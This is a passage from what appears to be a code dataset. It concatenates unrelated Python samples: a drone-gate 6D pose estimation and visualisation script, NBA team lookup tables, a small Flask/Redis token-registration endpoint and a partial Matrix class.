    # the corners derived from the mesh above.
    corners3D[0] = np.array([-11*feet_cm/2.0, -11*feet_cm/2.0, -11*feet_cm/2.0, -11*feet_cm/2.0, 11*feet_cm/2.0, 11*feet_cm/2.0, 11*feet_cm/2.0, 11*feet_cm/2.0])
    corners3D[1] = np.array([-feet_cm/2.0, -feet_cm/2.0, feet_cm/2.0, feet_cm/2.0, -feet_cm/2.0, -feet_cm/2.0, feet_cm/2.0, feet_cm/2.0])
    corners3D[2] = np.array([-11*feet_cm/2.0, 11*feet_cm/2.0, -11*feet_cm/2.0, 11*feet_cm/2.0, -11*feet_cm/2.0, 11*feet_cm/2.0, -11*feet_cm/2.0, 11*feet_cm/2.0])
    #print("3D Corners are:\n {} Shape: {} Type: {}".format(corners3D,corners3D.shape, type(corners3D)))
    diam = float(options['diam'])
    # now configure camera intrinsics
    internal_calibration = get_camera_intrinsic()
    # ******************************************#
    # NETWORK CREATION                          #
    # ******************************************#
    # Create the network based on cfg file
    model = Darknet(cfgfile)
    #model.print_network()
    model.load_weights(weightfile)
    model.cuda()
    model.eval()
    # ******************************************#
    # INPUT IMAGE PREPARATION FOR NN            #
    # ******************************************#
    # Now prepare image: convert to RGB, resize, transform to Tensor
    # use cuda,
    img = Image.open(imgfile).convert('RGB')
    ori_size = img.size # store original size
    img = img.resize((test_width, test_height))
    t1 = time.time()
    img = transforms.Compose([transforms.ToTensor(),])(img)#.float()
    img = Variable(img, requires_grad = True)
    img = img.unsqueeze(0)
    img = img.cuda()
    # ******************************************#
    # PASS IT TO NETWORK AND GET PREDICTION     #
    # ******************************************#
    # Forward pass
    output = model(img).data
    #print("Output Size: {}".format(output.size(0)))
    t2 = time.time()
    # ******************************************#
    # EXTRACT PREDICTIONS                       #
    # ******************************************#
    # Using confidence threshold, eliminate low-confidence predictions
    # and get only boxes over the confidence threshold
    all_boxes = get_region_boxes(output, conf_thresh, num_classes)
    boxes = all_boxes[0]
    # iterate through boxes to find the one with highest confidence
    best_conf_est = -1
    best_box_index = -1
    for j in range(len(boxes)):
        # the confidence is in index = 18
        if( boxes[j][18] > best_conf_est):
            box_pr = boxes[j] # get bounding box
            best_conf_est = boxes[j][18]
            best_box_index = j
    #print("Best box is: {} and 2D prediction is {}".format(best_box_index,box_pr))
    #print("Confidence is: {}".format(best_conf_est))
    print(best_conf_est.item(),type(best_conf_est.item()))
    # Denormalize the corner predictions
    # This are the predicted 2D points with which a bounding cube can be drawn
    corners2D_pr = np.array(np.reshape(box_pr[:18], [9, 2]), dtype='float32')
    corners2D_pr[:, 0] = corners2D_pr[:, 0] * ori_size[0] # Width
    corners2D_pr[:, 1] = corners2D_pr[:, 1] * ori_size[1] # Height
    t3 = time.time()
    # **********************************************#
    # GET OBJECT POSE ESTIMATION                    #
    # Remember the problem in 6D Pose estimation    #
    # is exactly to estimate the pose - position    #
    # and orientation of the object of interest     #
    # with reference to a camera frame. That is     #
    # why although the 2D projection of the 3D      #
    # bounding cube are ready, we still need to     #
    # compute the rotation matrix -orientation-     #
    # and a translation vector -position- for the   #
    # object                                        #
    #                                               #
    # **********************************************#
    # get rotation matrix and transform
    R_pr, t_pr = pnp(np.array(np.transpose(np.concatenate((np.zeros((3, 1)), corners3D[:3, :]), axis=1)), dtype='float32'), corners2D_pr, np.array(internal_calibration, dtype='float32'))
    t4 = time.time()
    # ******************************************#
    # DISPLAY IMAGE WITH BOUNDING CUBE          #
    # ******************************************#
    # Reload Original img
    img = cv2.imread(imgfile)
    # create a window to display image
    wname = "Prediction"
    cv2.namedWindow(wname)
    # draw each predicted 2D point
    for i, (x,y) in enumerate(corners2D_pr):
        # get colors to draw the lines
        col1 = 28*i
        col2 = 255 - (28*i)
        col3 = np.random.randint(0,256)
        cv2.circle(img, (x,y), 3, (col1,col2,col3), -1)
        cv2.putText(img, str(i), (int(x) + 5, int(y) + 5),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (col1, col2, col3), 1)
    # Get each predicted point and the centroid
    p1 = corners2D_pr[1]
    p2 = corners2D_pr[2]
    p3 = corners2D_pr[3]
    p4 = corners2D_pr[4]
    p5 = corners2D_pr[5]
    p6 = corners2D_pr[6]
    p7 = corners2D_pr[7]
    p8 = corners2D_pr[8]
    center = corners2D_pr[0]
    # Draw cube lines around detected object
    # draw front face
    line_point = 2
    cv2.line(img,(p1[0],p1[1]),(p2[0],p2[1]), (0,255,0),line_point)
    cv2.line(img,(p2[0],p2[1]),(p4[0],p4[1]), (0,255,0),line_point)
    cv2.line(img,(p4[0],p4[1]),(p3[0],p3[1]), (0,255,0),line_point)
    cv2.line(img,(p3[0],p3[1]),(p1[0],p1[1]), (0,255,0),line_point)
    # draw back face
    cv2.line(img,(p5[0],p5[1]),(p6[0],p6[1]), (0,255,0),line_point)
    cv2.line(img,(p7[0],p7[1]),(p8[0],p8[1]), (0,255,0),line_point)
    cv2.line(img,(p6[0],p6[1]),(p8[0],p8[1]), (0,255,0),line_point)
    cv2.line(img,(p5[0],p5[1]),(p7[0],p7[1]), (0,255,0),line_point)
    # draw right face
    cv2.line(img,(p2[0],p2[1]),(p6[0],p6[1]), (0,255,0),line_point)
    cv2.line(img,(p1[0],p1[1]),(p5[0],p5[1]), (0,255,0),line_point)
    # draw left face
    cv2.line(img,(p3[0],p3[1]),(p7[0],p7[1]), (0,255,0),line_point)
    cv2.line(img,(p4[0],p4[1]),(p8[0],p8[1]), (0,255,0),line_point)
    # Calculate gate dimensions
    min_x = np.min(corners3D[0,:]) # this are the gate outermost corners
    max_x = np.max(corners3D[0,:])
    min_y = np.min(corners3D[1,:])
    max_y = np.max(corners3D[1,:])
    min_z = np.min(corners3D[2,:])
    max_z = np.max(corners3D[2,:])
    gate_dim_z = max_z - min_z
    gate_dim_x = max_x - min_x
    gate_dim_y = max_y - min_y
    ############################################################
    # PREDICT FLYABLE AREA BASED ON ESTIMATED 2D PROJECTIONS
    ############################################################
    # Calculate Fly are based based on offset from predicted 2D
    # Projection
    flyarea_side = 243.84 #cm 8ft
    offset_z = (gate_dim_z - flyarea_side)/2.0
    offset_x = (gate_dim_x - flyarea_side)/2.0
    offset_z_ratio = (offset_z/gate_dim_z) # calculate as ratio wrt side, to use with pixels later
    offset_x_ratio = (offset_x/gate_dim_x)
    #print("Offset X ratio: {}, Offset Z ratio: {}".format(offset_x_ratio,offset_z_ratio))
    # GATE FRONT
    #
    # array to store all 4 points
    flyarea_corners_front = np.zeros((4,2), dtype = 'float32')
    # NOTE(review): only corner 1 uses offset_z_ratio for its vertical
    # component; corners 2-4 use offset_x_ratio for both components.
    # Looks like a copy-paste slip — confirm intended ratios.
    # corner 1
    flyarea_corners_front[0][0] = p4[0] + int((p2[0]-p4[0])*offset_x_ratio)
    flyarea_corners_front[0][1] = p4[1] + int((p3[1]-p4[1])*offset_z_ratio)
    # corner 2
    flyarea_corners_front[1][0] = p2[0] + int((p4[0]-p2[0])*offset_x_ratio)
    flyarea_corners_front[1][1] = p2[1] + int((p1[1]-p2[1])*offset_x_ratio)
    # corner 3
    flyarea_corners_front[2][0] = p1[0] + int((p3[0]-p1[0])*offset_x_ratio)
    flyarea_corners_front[2][1] = p1[1] + int((p2[1]-p1[1])*offset_x_ratio)
    # corner 4
    flyarea_corners_front[3][0] = p3[0] + int((p1[0]-p3[0])*offset_x_ratio)
    flyarea_corners_front[3][1] = p3[1] + int((p4[1]-p3[1])*offset_x_ratio)
    #print("Front points: {}".format(flyarea_corners_front))
    # draw front gate area
    fa_p1_f = flyarea_corners_front[0]
    fa_p2_f = flyarea_corners_front[1]
    fa_p3_f = flyarea_corners_front[2]
    fa_p4_f = flyarea_corners_front[3]
    """
    cv2.line(img,(fa_p1_f[0],fa_p1_f[1]),(fa_p2_f[0],fa_p2_f[1]), (255,0,255),line_point)
    cv2.line(img,(fa_p2_f[0],fa_p2_f[1]),(fa_p3_f[0],fa_p3_f[1]), (255,0,255),line_point)
    cv2.line(img,(fa_p4_f[0],fa_p4_f[1]),(fa_p1_f[0],fa_p1_f[1]), (255,0,255),line_point)
    cv2.line(img,(fa_p3_f[0],fa_p3_f[1]),(fa_p4_f[0],fa_p4_f[1]), (255,0,255),line_point)
    """
    # GATE BACK
    #
    # array to store all 4 points
    flyarea_corners_back = np.zeros((4,2), dtype = 'float32')
    # corner 1
    flyarea_corners_back[0][0] = p8[0] + int((p6[0]-p8[0])*offset_x_ratio)
    flyarea_corners_back[0][1] = p8[1] + int((p7[1]-p8[1])*offset_z_ratio)
    # corner 2
    flyarea_corners_back[1][0] = p6[0] + int((p8[0]-p6[0])*offset_x_ratio)
    flyarea_corners_back[1][1] = p6[1] + int((p5[1]-p6[1])*offset_x_ratio)
    # corner 3
    flyarea_corners_back[2][0] = p5[0] + int((p7[0]-p5[0])*offset_x_ratio)
    flyarea_corners_back[2][1] = p5[1] + int((p6[1]-p5[1])*offset_x_ratio)
    # corner 4
    flyarea_corners_back[3][0] = p7[0] + int((p5[0]-p7[0])*offset_x_ratio)
    flyarea_corners_back[3][1] = p7[1] + int((p8[1]-p7[1])*offset_x_ratio)
    #print("Back points: {}".format(flyarea_corners_back))
    # draw back gate area
    fa_p1_b = flyarea_corners_back[0]
    fa_p2_b = flyarea_corners_back[1]
    fa_p3_b = flyarea_corners_back[2]
    fa_p4_b = flyarea_corners_back[3]
    """
    cv2.line(img,(fa_p1_b[0],fa_p1_b[1]),(fa_p2_b[0],fa_p2_b[1]), (255,0,255),line_point)
    cv2.line(img,(fa_p2_b[0],fa_p2_b[1]),(fa_p3_b[0],fa_p3_b[1]), (255,0,255),line_point)
    cv2.line(img,(fa_p4_b[0],fa_p4_b[1]),(fa_p1_b[0],fa_p1_b[1]), (255,0,255),line_point)
    cv2.line(img,(fa_p3_b[0],fa_p3_b[1]),(fa_p4_b[0],fa_p4_b[1]), (255,0,255),line_point)
    """
    """
    # draw each predicted 2D point
    for i, (x,y) in enumerate(flyarea_corners_front):
        # get colors to draw the lines
        col1 = 0#np.random.randint(0,256)
        col2 = 0#np.random.randint(0,256)
        col3 = 255#np.random.randint(0,256)
        cv2.circle(img, (x,y), 3, (col1,col2,col3), -1)
        cv2.putText(img, str(i), (int(x) + 5, int(y) + 5),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (col1, col2, col3), 1)
    # draw each predicted 2D point
    for i, (x,y) in enumerate(flyarea_corners_back):
        # get colors to draw the lines
        col1 = 0#np.random.randint(0,256)
        col2 = 0#np.random.randint(0,256)
        col3 = 255#np.random.randint(0,256)
        cv2.circle(img, (x,y), 3, (col1,col2,col3), -1)
        cv2.putText(img, str(i+4), (int(x) + 5, int(y) + 5),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (col1, col2, col3), 1)
    """
    # GATE ALL FRONT AND BACK
    # LINES
    # FRONT
    front_up = Line(flyarea_corners_front[0],flyarea_corners_front[1])
    front_right = Line(flyarea_corners_front[1],flyarea_corners_front[2])
    front_down = Line(flyarea_corners_front[2],flyarea_corners_front[3])
    front_left = Line(flyarea_corners_front[3],flyarea_corners_front[0])
    #print("Front Up Line: m {:.4f} b{:.4f}".format(front_up.m, front_up.b))
    #print("Front Right Line: m {:.4f} b{:.4f}".format(front_right.m, front_right.b))
    #print("Front Down Line: m {:.4f} b{:.4f}".format(front_down.m, front_down.b))
    #print("Front Left Line: m {:.4f} b{:.4f}".format(front_left.m, front_left.b))
    # BACK
    back_up = Line(flyarea_corners_back[0],flyarea_corners_back[1])
    back_right = Line(flyarea_corners_back[1],flyarea_corners_back[2])
    back_down = Line(flyarea_corners_back[2],flyarea_corners_back[3])
    back_left = Line(flyarea_corners_back[3],flyarea_corners_back[0])
    #print("Back Up Line: m {:.4f} b{:.4f}".format(back_up.m, back_up.b))
    #print("Back Right Line: m {:.4f} b{:.4f}".format(back_right.m, back_right.b))
    #print("Back Down Line: m {:.4f} b{:.4f}".format(back_down.m, back_down.b))
    #print("Back Left Line: m {:.4f} b{:.4f}".format(back_left.m, back_left.b))
    # Intersections
    intersections = np.zeros((8,2))
    # store in an structure that makes looping easy
    front_lines = [[front_right,front_left],[front_right,front_left],[front_up,front_down],[front_up,front_down]]
    back_lines = [back_up,back_down,back_right,back_left]
    # compare back line with corresponding front lines
    for k, (back_line, front_line_pair) in enumerate(zip(back_lines, front_lines)):
        for j, front_line in enumerate(front_line_pair):
            x_i = (back_line.b - front_line.b)/(front_line.m - back_line.m) # x coord of intersection point
            y_i = back_line.eval(x_i) # y coord of intersection point
            intersections[k*2+j][0] = x_i
            intersections[k*2+j][1] = y_i
    #print("Intersections: ")
    #print(intersections)
    # draw each intersection point
    #for i, (x,y) in enumerate(intersections):
        #cv2.circle(img, (int(x),int(y)), 3, (0,255,255), -1)
        #cv2.putText(img, str(i), (int(x) + 5, int(y) + 5),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,255,255), 1)
    # group all points
    points = np.concatenate((flyarea_corners_front,flyarea_corners_back, intersections), axis = 0)
    # the corners of the flyable area is composed of the 4 points with the
    # shortest distance to the centroid
    points_sorted = [(np.linalg.norm(points[i]-center),points[i]) for i in range(points.shape[0])]
    points_sorted.sort()
    #print(points_sorted)
    flyarea_corners = np.zeros((4,2), dtype = 'float32')
    """
    for k in range(4):
        #print(k)
        point = points_sorted[k][1]
        #print(point)
        flyarea_corners[k] = point
        x = point[0]
        y = point[1]
        cv2.circle(img, (int(x),int(y)), 10, (0,255,255), -1)
        cv2.putText(img, str(k), (int(x) + 5, int(y) + 5),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,255,255), 1)
    """
    # Per-corner candidate selection: for each corner gather the front/back
    # corners plus the two cross intersections, keep the closest to center.
    # corner 1
    x1,y1 = find_intersection(front_up,back_left)
    dummy1 = np.array([x1,y1])
    x1,y1 = find_intersection(back_up,front_left)
    dummy2 = np.array([x1,y1])
    c_points = np.stack((flyarea_corners_front[0],flyarea_corners_back[0],dummy1,dummy2))
    points_sorted = [(np.linalg.norm(c_points[i]-center),c_points[i]) for i in range(c_points.shape[0])]
    points_sorted.sort()
    flyarea_corners[0]=points_sorted[0][1] # extract the point with shortest distance to centroid
    """
    # draw each intersection point
    for i, (x,y) in enumerate(c_points):
        cv2.circle(img, (int(x),int(y)), 3, (0,255,255), -1)
        cv2.putText(img, str(i), (int(x) + 5, int(y) + 5),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,255,255), 1)
    """
    # corner 2
    x1,y1 = find_intersection(front_up,back_right)
    dummy1 = np.array([x1,y1])
    x1,y1 = find_intersection(back_up,front_right)
    dummy2 = np.array([x1,y1])
    c_points = np.stack((flyarea_corners_front[1],flyarea_corners_back[1],dummy1,dummy2))
    points_sorted = [(np.linalg.norm(c_points[i]-center),c_points[i]) for i in range(c_points.shape[0])]
    points_sorted.sort()
    flyarea_corners[1]=points_sorted[0][1] # extract the point with shortest distance to centroid
    """
    # draw each intersection point
    for i, (x,y) in enumerate(c_points):
        cv2.circle(img, (int(x),int(y)), 3, (0,255,255), -1)
        cv2.putText(img, str(i), (int(x) + 5, int(y) + 5),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,255,255), 1)
    """
    # corner 3
    x1,y1 = find_intersection(front_down,back_right)
    dummy1 = np.array([x1,y1])
    x1,y1 = find_intersection(back_down,front_right)
    dummy2 = np.array([x1,y1])
    c_points = np.stack((flyarea_corners_front[2],flyarea_corners_back[2],dummy1,dummy2))
    points_sorted = [(np.linalg.norm(c_points[i]-center),c_points[i]) for i in range(c_points.shape[0])]
    points_sorted.sort()
    flyarea_corners[2]=points_sorted[0][1] # extract the point with shortest distance to centroid
    """
    # draw each intersection point
    for i, (x,y) in enumerate(c_points):
        cv2.circle(img, (int(x),int(y)), 3, (0,255,255), -1)
        cv2.putText(img, str(i), (int(x) + 5, int(y) + 5),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,255,255), 1)
    """
    # corner 4
    x1,y1 = find_intersection(front_down,back_left)
    dummy1 = np.array([x1,y1])
    x1,y1 = find_intersection(back_down,front_left)
    dummy2 = np.array([x1,y1])
    c_points = np.stack((flyarea_corners_front[3],flyarea_corners_back[3],dummy1,dummy2))
    points_sorted = [(np.linalg.norm(c_points[i]-center),c_points[i]) for i in range(c_points.shape[0])]
    points_sorted.sort()
    flyarea_corners[3]=points_sorted[0][1] # extract the point with shortest distance to centroid
    """
    # draw each intersection point
    for i, (x,y) in enumerate(c_points):
        cv2.circle(img, (int(x),int(y)), 3, (0,255,255), -1)
        cv2.putText(img, str(i), (int(x) + 5, int(y) + 5),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,255,255), 1)
    """
    fa_p1 = flyarea_corners[0]
    fa_p2 = flyarea_corners[1]
    fa_p3 = flyarea_corners[2]
    fa_p4 = flyarea_corners[3]
    """
    cv2.line(img,(fa_p1[0],fa_p1[1]),(fa_p2[0],fa_p2[1]), (0,0,255),line_point)
    cv2.line(img,(fa_p2[0],fa_p2[1]),(fa_p3[0],fa_p3[1]), (0,0,255),line_point)
    cv2.line(img,(fa_p4[0],fa_p4[1]),(fa_p1[0],fa_p1[1]), (0,0,255),line_point)
    cv2.line(img,(fa_p3[0],fa_p3[1]),(fa_p4[0],fa_p4[1]), (0,0,255),line_point)
    """
    # YET ANOTHER METHOD
    # Take the innermost of each front/back edge pair (using each line's
    # stored sample point) and intersect them — this result overwrites the
    # per-corner selection above and is what actually gets drawn.
    if( back_up.p[1] > front_up.p[1]):
        up_line = back_up
    else:
        up_line = front_up
    if( back_down.p[1] < front_down.p[1]):
        down_line = back_down
    else:
        down_line = front_down
    if( back_right.p[0] < front_right.p[0]):
        right_line = back_right
    else:
        right_line = front_right
    if( back_left.p[0] > front_left.p[0] ):
        left_line = back_left
    else:
        left_line = front_left
    x1,y1 = find_intersection(up_line,left_line)
    dummy1 = np.array([x1,y1])
    flyarea_corners[0] = dummy1
    x1,y1 = find_intersection(up_line,right_line)
    dummy1 = np.array([x1,y1])
    flyarea_corners[1] = dummy1
    x1,y1 = find_intersection(down_line,right_line)
    dummy1 = np.array([x1,y1])
    flyarea_corners[2] = dummy1
    x1,y1 = find_intersection(down_line,left_line)
    dummy1 = np.array([x1,y1])
    flyarea_corners[3] = dummy1
    fa_p1 = flyarea_corners[0]
    fa_p2 = flyarea_corners[1]
    fa_p3 = flyarea_corners[2]
    fa_p4 = flyarea_corners[3]
    cv2.line(img,(fa_p1[0],fa_p1[1]),(fa_p2[0],fa_p2[1]), (0,0,255),line_point)
    cv2.line(img,(fa_p2[0],fa_p2[1]),(fa_p3[0],fa_p3[1]), (0,0,255),line_point)
    cv2.line(img,(fa_p4[0],fa_p4[1]),(fa_p1[0],fa_p1[1]), (0,0,255),line_point)
    cv2.line(img,(fa_p3[0],fa_p3[1]),(fa_p4[0],fa_p4[1]), (0,0,255),line_point)
    """
    ############################################################
    # PREDICT FLYABLE AREA BASED ON ESTIMATED POSE
    ############################################################
    offset = 0.0 # flyable area corners are at an offset from outermost corners
    y = min_y # and they are over a plane
    p1 = np.array([[min_x+offset],[y],[min_z+offset]])
    p2 = np.array([[min_x+offset],[y],[max_z-offset]])
    p3 = np.array([[max_x-offset],[y],[min_z+offset]])
    p4 = np.array([[max_x-offset],[y],[max_z-offset]])
    # These are 4 points defining the square of the flyable area
    flyarea_3Dpoints = np.concatenate((p1,p2,p3,p4), axis = 1)
    flyarea_3Dpoints = np.concatenate((flyarea_3Dpoints, np.ones((1,4))), axis = 0)
    print("Gate Flyable Area 3D:\n{}".format(flyarea_3Dpoints))
    # get transform
    Rt_pr = np.concatenate((R_pr, t_pr), axis=1)
    flyarea_2Dpoints = compute_projection(flyarea_3Dpoints, Rt_pr, internal_calibration)
    print("Gate Flyable Area 2D projection:\n{}".format(flyarea_2Dpoints))
    for i,(x,y) in enumerate(flyarea_2Dpoints.T):
        col1 = 0#np.random.randint(0,256)
        col2 = 0#np.random.randint(0,256)
        col3 = 255#np.random.randint(0,256)
        cv2.circle(img, (x,y), 3, (col1,col2,col3), -1)
        cv2.putText(img, str(i), (int(x) + 5, int(y) + 5),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (col1, col2, col3), 1)
    p1_2d = np.array([ flyarea_2Dpoints[0][0], flyarea_2Dpoints[1][0]])
    p2_2d = np.array([ flyarea_2Dpoints[0][1], flyarea_2Dpoints[1][1]])
    p3_2d = np.array([ flyarea_2Dpoints[0][2], flyarea_2Dpoints[1][2]])
    p4_2d = np.array([ flyarea_2Dpoints[0][3], flyarea_2Dpoints[1][3]])
    """
    # Show the image and wait key press
    cv2.imshow(wname, img)
    cv2.waitKey()
    print("Rotation: {}".format(R_pr))
    print("Translation: {}".format(t_pr))
    print(" Predict time: {}".format(t2 - t1))
    print(" 2D Points extraction time: {}".format(t3- t2))
    print(" Pose calculation time: {}:".format(t4 - t3))
    print(" Total time: {}".format(t4-t1))
    print("Press any key to close.")
if __name__ == '__main__':
    import sys
    # Expect exactly four positional arguments after the script name.
    if len(sys.argv) == 5:
        _, datacfg_file, cfgfile_file, weightfile_file, imgfile_file = sys.argv
        test(datacfg_file, cfgfile_file, weightfile_file, imgfile_file)
    else:
        print('Usage:')
        print(' python valid.py datacfg cfgfile weightfile imagefile')
team_abbr_lookup = {
"Toronto Raptors": "TOR",
"Brooklyn Nets": "BRK",
"New York Knicks": "NYK",
"Boston Celtics": "BOS",
"Philadelphia 76ers": "PHI",
"Indiana Pacers": "IND",
"Chicago Bulls": "CHI",
"Cleveland Cavaliers": "CLE",
"Detroit Pistons": "DET",
"Milwaukee Bucks": "MIL",
"Miami Heat": "MIA",
"Washington Wizards": "WAS",
"Charlotte Bobcats": "CHA",
"Charlotte Hornets": "CHA",
"Atlanta Hawks": "ATL",
"Orlando Magic": "ORL",
"Oklahoma City Thunder": "OKC",
"Portland Trail Blazers": "POR",
"Minnesota Timberwolves": "MIN",
"Denver Nuggets": "DEN",
"Utah Jazz": "UTA",
"Los Angeles Clippers": "LAC",
"Golden State Warriors": "GSW",
"Phoenix Suns": "PHO",
"Sacramento Kings": "SAC",
"Los Angeles Lakers": "LAL",
"San Antonio Spurs": "SAS",
"Houston Rockets": "HOU",
"Memphis Grizzlies": "MEM",
"Dallas Mavericks": "DAL",
"New Orleans Pelicans": "NOP"
}
abbr_team_lookup = {
"TOR": "Toronto Raptors",
"BRK": "Brooklyn Nets",
"NYK": "New York Knicks",
"BOS": "Boston Celtics",
"PHI": "Philadelphia 76ers",
"IND": "Indiana Pacers",
"CHI": "Chicago Bulls",
"CLE": "Cleveland Cavaliers",
"DET": "Detroit Pistons",
"MIL": "Milwaukee Bucks",
"MIA": "Miami Heat",
"WAS": "Washington Wizards",
"CHA": "Charlotte Hornets",
"ATL": "Atlanta Hawks",
"ORL": "Orlando Magic",
"OKC": "Oklahoma City Thunder",
"POR": "Portland Trail Blazers",
"MIN": "Minnesota Timberwolves",
"DEN": "Denver Nuggets",
"UTA": "Utah Jazz",
"LAC": "Los Angeles Clippers",
"GSW": "Golden State Warriors",
"PHO": "Phoenix Suns",
"SAC": "Sacramento Kings",
"LAL": "Los Angeles Lakers",
"SAS": "San Antonio Spurs",
"HOU": "Houston Rockets",
"MEM": "Memphis Grizzlies",
"DAL": "Dallas Mavericks",
"NOP": "New Orleans Pelicans"
}
# Maps full franchise name -> OddsShark's internal numeric team id.
oddsshark_team_id_lookup = {
    "Toronto Raptors": 20742,
    "Brooklyn Nets": 20749,
    "New York Knicks": 20747,
    "Boston Celtics": 20722,
    "Philadelphia 76ers": 20731,
    "Indiana Pacers": 20737,
    "Chicago Bulls": 20732,
    "Cleveland Cavaliers": 20735,
    "Detroit Pistons": 20743,
    "Milwaukee Bucks": 20725,
    "Miami Heat": 20726,
    "Washington Wizards": 20746,
    "Charlotte Bobcats": 20751,
    # Consistency fix: team_abbr_lookup carries both Charlotte names (the
    # franchise renamed from Bobcats to Hornets in 2014), so a Hornets key
    # must resolve here too instead of raising KeyError. Same id — it is
    # the same franchise; confirm against oddsshark.com if ids change.
    "Charlotte Hornets": 20751,
    "Atlanta Hawks": 20734,
    "Orlando Magic": 20750,
    "Oklahoma City Thunder": 20728,
    "Portland Trail Blazers": 20748,
    "Minnesota Timberwolves": 20744,
    "Denver Nuggets": 20723,
    "Utah Jazz": 20738,
    "Los Angeles Clippers": 20736,
    "Golden State Warriors": 20741,
    "Phoenix Suns": 20730,
    "Sacramento Kings": 20745,
    "Los Angeles Lakers": 20739,
    "San Antonio Spurs": 20724,
    "Houston Rockets": 20740,
    "Memphis Grizzlies": 20729,
    "Dallas Mavericks": 20727,
    "New Orleans Pelicans": 20733
}
oddsshark_city_lookup = {
"Toronto": "Toronto Raptors",
"Brooklyn": "Brooklyn Nets",
"New York": "New York Knicks",
"Boston": "Boston Celtics",
"Philadelphia": "Philadelphia 76ers",
"Indiana": "Indiana Pacers",
"Chicago": "Chicago Bulls",
"Cleveland": "Cleveland Cavaliers",
"Detroit": "Detroit Pistons",
"Milwaukee": "Milwaukee Bucks",
"Miami": "Miami Heat",
"Washington": "Washington Wizards",
"Charlotte": "Charlotte Hornets",
"Atlanta": "Atlanta Hawks",
"Orlando": "Orlando Magic",
"Oklahoma City": "Oklahoma City Thunder",
"Portland": "Portland Trail Blazers",
"Minnesota": "Minnesota Timberwolves",
"Denver": "Denver Nuggets",
"Utah": "Utah Jazz",
"LA Clippers": "Los Angeles Clippers",
"Golden State": "Golden State Warriors",
"Phoenix": "Phoenix Suns",
"Sacramento": "Sacramento Kings",
"LA Lakers": "Los Angeles Lakers",
"San Antonio": "San Antonio Spurs",
"Houston": "Houston Rockets",
"Memphis": "Memphis Grizzlies",
"Dallas": "Dallas Mavericks",
"New Orleans": "New Orleans Pelicans"
}
| 4,028 | 1,754 |
from flask import Flask, request
import redis
app = Flask(__name__)
rconn = redis.StrictRedis()
def keygen(key):
    """Build the Redis key ("token:<key>") under which a token is stored."""
    return "token:{}".format(key)
@app.route('/api/register', methods=["POST"])
def register_token():
    """Store a client's token in Redis, keyed by user id.

    Expects form fields ``userid`` and ``token``. Returns an empty 204
    response on success — the original returned None, which Flask rejects
    with a TypeError at request time.
    """
    userid = request.form['userid']
    token = request.form['token']
    rconn.set(keygen(userid), token)
    return '', 204
| 335 | 118 |
import random
from collections import namedtuple
MatrixShape = namedtuple("MatrixShape", ["rows", "columns"])
def array2d(shape, value):
    """Build a nested list of shape (rows, cols), filling cell (i, j) with value(i, j)."""
    rows, cols = shape[0], shape[1]
    grid = []
    for i in range(rows):
        grid.append([value(i, j) for j in range(cols)])
    return grid
class Matrix:
    """A dense 2-D matrix stored as a nested list (row-major).

    Supports elementwise +, -, *, /, ** with scalars or same-shaped
    matrices, matrix product via @, iteration in row-major order,
    reshape, and transpose. `shape` is a MatrixShape(rows, columns).
    """
    def __init__(self, array):
        # Validate rectangularity: every row must match the first row's length.
        self.array = array
        rows = len(array)
        columns = len(array[0])
        for i in range(rows):
            if len(array[i]) != columns:
                raise ValueError(
                    "Matrix can not be created from ragged nested sequences"
                )
        self.shape = MatrixShape(rows, columns)
    def __add__(self, other):
        """Elementwise sum with a same-shaped Matrix, or add a scalar to every entry."""
        value = None
        if isinstance(other, Matrix):
            if self.shape != other.shape:
                raise ValueError("Matrices must have the same shape")
            value = lambda i, j: self[i][j] + other[i][j]
        else:
            value = lambda i, j: self[i][j] + other
        return Matrix.build(self.shape, value)
    def __eq__(self, other):
        """Equal iff `other` is a Matrix with identical shape and entries."""
        if not isinstance(other, Matrix):
            return False
        if self.shape != other.shape:
            return False
        rows, columns = self.shape
        for i in range(rows):
            for j in range(columns):
                if self[i][j] != other[i][j]:
                    return False
        return True
    def __getitem__(self, row):
        """Return row `row` as a list, enabling m[i][j] element access."""
        return self.array[row]
    def __iter__(self):
        """Yield all entries in row-major order."""
        for i in range(self.shape.rows):
            for j in range(self.shape.columns):
                yield self[i][j]
    def __matmul__(self, other):
        """Matrix product; self's column count must equal other's row count."""
        if self.shape.columns != other.shape.rows:
            raise ValueError(
                "The number of columns of the first matrix must be equal "
                "to the number of rows of the second matrix!"
            )
        # Fill a zero matrix in place with the usual triple-loop dot products.
        matrix = Matrix.zero((self.shape.rows, other.shape.columns))
        for i in range(self.shape.rows):
            for j in range(other.shape.columns):
                matrix[i][j] = sum(
                    self[i][k] * other[k][j] for k in range(self.shape.columns)
                )
        return matrix
    def __mul__(self, other):
        """Elementwise (Hadamard) product with a Matrix, or scale by a scalar."""
        value = None
        if isinstance(other, Matrix):
            if self.shape != other.shape:
                raise ValueError("Matrices must have the same shape")
            value = lambda i, j: self[i][j] * other[i][j]
        else:
            value = lambda i, j: self[i][j] * other
        return Matrix.build(self.shape, value)
    def __pow__(self, other):
        """Raise every entry to the power `other` (elementwise, not matrix power)."""
        return Matrix.build(self.shape, lambda i, j: self[i][j] ** other)
    def __neg__(self):
        """Negate every entry."""
        return Matrix.build(self.shape, lambda i, j: -self[i][j])
    def __radd__(self, other):
        # scalar + matrix delegates to __add__ (addition commutes).
        return self.__add__(other)
    def __repr__(self):
        """Multi-line literal-style representation: Matrix([[...], ...])."""
        buffer = []
        for i in range(self.shape.rows):
            body = ", ".join(str(j) for j in self[i])
            preffix = "    "
            suffix = "" if i == self.shape.rows - 1 else ","
            buffer.append(f"{preffix}[{body}]{suffix}")
        return "Matrix([\n{}\n])".format("\n".join(buffer))
    def __rmul__(self, other):
        # scalar * matrix delegates to __mul__ (elementwise product commutes).
        return self.__mul__(other)
    def __rpow__(self, other):
        """scalar ** matrix: raise `other` to each entry, elementwise."""
        return Matrix.build(self.shape, lambda i, j: other ** self[i][j])
    def __rsub__(self, other):
        """scalar - matrix, elementwise."""
        return Matrix.build(self.shape, lambda i, j: other - self[i][j])
    def __rtruediv__(self, other):
        """scalar / matrix, elementwise."""
